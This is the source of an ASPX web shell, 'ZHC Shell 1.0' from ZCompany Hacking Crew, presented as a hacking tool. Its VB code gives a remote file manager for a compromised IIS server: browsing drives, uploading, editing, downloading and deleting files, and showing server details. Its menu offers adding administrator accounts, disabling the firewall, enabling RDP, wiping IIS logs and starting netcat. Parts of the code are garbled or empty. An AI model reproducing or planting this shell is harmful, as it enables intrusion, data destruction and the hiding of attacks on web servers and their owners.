Aspx Shell By XXx_Death

<%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <% if request.QueryString("action")="down" and session("XXx_Death_xXX")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim hu as string = request.QueryString("action") if hu="cmd" then TITLE="CMD.NET" elseif hu="sqlrootkit" then TITLE="zone-hack.com.NET" elseif hu="clonetime" then TITLE="Clone Time" elseif hu="information" then TITLE="Web Server Info" elseif hu="goto" then TITLE="aspx zhc shell by xxx_death_xxx::2011" else TITLE=request.ServerVariables("HTTP_HOST") end if %>

Aspx Shell By XXx_Death_xXX & ZHC <% Dim error_x as Exception Try if session("XXx_Death_xXX")<>1 then response.Write("
") response.Write("Welcome to ZCompany Hacking Crew Shell
") response.Write("Note: You MUST click the login button and not hit enter.") %> <% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim hupo as string dim xfile as fileinfo %>

Current Directory: <%=url%>

Action:	New \| Upload \| title="Go to this file's directory"> Index Root \| Exit
Drive:	<% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %>
Tools:	SQL Command \| Command Line \| System Information
Admin Tricks:	Add User \| Add User To Administrators Group \| Disable Windows Firewall \| Enable RDP \| Wipe IIS Logs
Silentz's Tricks:	Start NC

" response.Write(hupo) for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) hupo= "" response.Write(hupo) response.Write("") response.Write("") hupo="" response.Write(hupo) response.Write("") next %>") hupo="" response.Write(hupo) hupo="" response.Write(hupo) response.Write("") hupo="" response.Write(hupo) response.Write("") next response.Write("

Name	Size	Last Modified	Action
<% hupo= "
\|Parent Directory\|
" & xdir.name & "	<dir>	" & Directory.GetLastWriteTime(url & xdir.name) & "	Cut" & "\|Copy\|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "	" & GetSize(xfile.length) & "	" & file.GetLastWriteTime(url & xfile.name) & "	Edit\|Cut\|Copy\|Rename\|Download\|Del

") %>

<% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>

[ System information ]

Web Server Information
Server IP	<%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name	<%=Environment.MachineName%>
Network Name	<%=Environment.UserDomainName.ToString()%>
User Name in this Process	<%=Environment.UserName%>
OS Version	<%=Environment.OSVersion.ToString()%>
Started Time	<%=GetStartedTime(Environment.Tickcount)%> Hours
System Time	<%=now%>
IIS Version	<%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS	<%=request.ServerVariables("HTTPS")%>
PATH_INFO	<%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED	<%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT	<%=request.ServerVariables("SERVER_PORT")%>
SeesionID	<%=Session.SessionID%>
Client Infomation
Client Proxy	<%=CP%>
Client IP	<%=CIP%>
User	<%=request.ServerVariables("HTTP_USER_AGENT")%>

<% case "cmd" %> <% case "cmd2" %> <% case "cmd3" %> <% case "cmd4" %> <% case "cmd5" %> <% case "cmd6" %> <% case "cmd7" %> <% case "sqlrootkit" %> <% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "plaster" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %> <% case "new" url=request.QueryString("src") %> <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %> <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %> <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

<% case "logout" session.Abandon() response.Write("

Have a nice day...") response.Write(" ZHC Shell 1.0 • 2011
By XXx_Death_xXX Of ZCompany Hacking Crew • zone-hack.com #ZHC

Path	*
Content